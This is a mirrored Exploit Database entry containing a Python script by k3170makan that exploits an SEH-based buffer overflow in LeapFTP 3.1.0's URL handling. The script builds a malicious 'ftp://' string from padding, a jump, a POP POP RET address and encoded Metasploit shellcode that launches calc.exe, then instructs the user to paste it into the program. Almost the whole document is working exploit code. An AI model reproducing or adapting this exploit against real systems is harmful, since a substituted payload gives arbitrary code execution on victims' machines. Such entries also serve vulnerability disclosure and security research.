LeapFTP 3.1.0 – URL Handling Buffer Overflow (SEH)

• Exploit Database
• 33 阅读

• 作者： k3170makan
  日期： 2014-09-01
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/34512/

• # Exploit Title: LeapFTP 3.1.0 URL Handling SEH Exploit
  # Google Dork: "k3170makan is totally awesome" hehehe
  # Date: 2014-08-28
  # Exploit Author: k3170makan
  # Vendor Homepage:http://www.leapware.com/
  # Software Link: http://www.leapware.com/download.html
  # Version: 3.1.0
  # Tested on: Windows XP SP0 (DoSon Windows SP2, Windows 7)
  # Timeline:
  # *2014-08-28 : Initial contact
  # *2014-09-01 : no contact
  # *2014-09-01 : public disclosure
  """
  This vulnerability was disclosed according to the terms of my public
  disclosure policy (
  http://blog.k3170makan.com/p/public-disclosure-policy.html)
  """
  from sys import argv
  if __name__ == "__main__":
  ovTrigger = 1093
  f = open("exploit.txt","w")
  f.write("ftp://")
  f.write("A"*ovTrigger)
  f.write("\xEB\x06\x90\x90") #JMP to payload
  f.write("\x44\xD3\x4A\x77") #POP POP RET
  f.write("\x90"*30)
  #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/alpha_mixed -c 1
  -b \x00\x0a\x0d\xff
  shellcode = "\x89\xe0\xd9\xe8\xd9\x70\xf4\x5f\x57\x59\x49\x49\x49\x49" +\
  "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +\
  "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +\
  "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +\
  "\x42\x75\x4a\x49\x49\x6c\x68\x68\x4f\x79\x35\x50\x53\x30" +\
  "\x45\x50\x35\x30\x6e\x69\x79\x75\x30\x31\x6a\x72\x30\x64" +\
  "\x4c\x4b\x53\x62\x56\x50\x4e\x6b\x76\x32\x56\x6c\x6c\x4b" +\
  "\x42\x72\x62\x34\x6e\x6b\x54\x32\x46\x48\x76\x6f\x6e\x57" +\
  "\x61\x5a\x67\x56\x45\x61\x39\x6f\x64\x71\x4b\x70\x4e\x4c" +\
  "\x55\x6c\x53\x51\x33\x4c\x67\x72\x76\x4c\x51\x30\x59\x51" +\
  "\x38\x4f\x64\x4d\x45\x51\x49\x57\x4d\x32\x58\x70\x56\x32" +\
  "\x70\x57\x4e\x6b\x31\x42\x76\x70\x4e\x6b\x61\x52\x47\x4c" +\
  "\x73\x31\x5a\x70\x4c\x4b\x57\x30\x53\x48\x6c\x45\x4f\x30" +\
  "\x33\x44\x51\x5a\x65\x51\x48\x50\x42\x70\x6e\x6b\x72\x68" +\
  "\x67\x68\x6c\x4b\x30\x58\x47\x50\x77\x71\x5a\x73\x49\x73" +\
  "\x77\x4c\x71\x59\x6e\x6b\x35\x64\x4e\x6b\x57\x71\x4b\x66" +\
  "\x35\x61\x4b\x4f\x34\x71\x4f\x30\x4e\x4c\x59\x51\x4a\x6f" +\
  "\x74\x4d\x75\x51\x58\x47\x44\x78\x59\x70\x62\x55\x68\x74" +\
  "\x33\x33\x61\x6d\x4b\x48\x65\x6b\x33\x4d\x47\x54\x72\x55" +\
  "\x58\x62\x36\x38\x6e\x6b\x32\x78\x35\x74\x55\x51\x4a\x73" +\
  "\x73\x56\x4e\x6b\x66\x6c\x72\x6b\x6e\x6b\x71\x48\x77\x6c" +\
  "\x47\x71\x78\x53\x6e\x6b\x73\x34\x4e\x6b\x75\x51\x5a\x70" +\
  "\x4b\x39\x77\x34\x35\x74\x71\x34\x31\x4b\x51\x4b\x75\x31" +\
  "\x71\x49\x70\x5a\x66\x31\x4b\x4f\x39\x70\x43\x68\x43\x6f" +\
  "\x53\x6a\x4c\x4b\x42\x32\x38\x6b\x4b\x36\x53\x6d\x42\x4a" +\
  "\x36\x61\x4c\x4d\x4b\x35\x68\x39\x65\x50\x35\x50\x55\x50" +\
  "\x70\x50\x52\x48\x76\x51\x6c\x4b\x62\x4f\x6c\x47\x79\x6f" +\
  "\x6e\x35\x6f\x4b\x4a\x50\x4e\x55\x69\x32\x32\x76\x55\x38" +\
  "\x79\x36\x6c\x55\x6f\x4d\x4d\x4d\x6b\x4f\x78\x55\x75\x6c" +\
  "\x73\x36\x31\x6c\x57\x7a\x4b\x30\x79\x6b\x49\x70\x70\x75" +\
  "\x64\x45\x4f\x4b\x63\x77\x37\x63\x62\x52\x52\x4f\x52\x4a" +\
  "\x77\x70\x56\x33\x69\x6f\x4e\x35\x30\x63\x35\x31\x50\x6c" +\
  "\x51\x73\x36\x4e\x45\x35\x44\x38\x33\x55\x53\x30\x41\x41"
  f.write(shellcode)
  f.flush()
  f.close()
  #copy contents of exploit.txt to your clipboard and then launch LeapFTP
  <http://about.me/k3170makan>
  Keith Makan <http://about.me/k3170makan>
  about.me/k3170makan
  <http://about.me/k3170makan>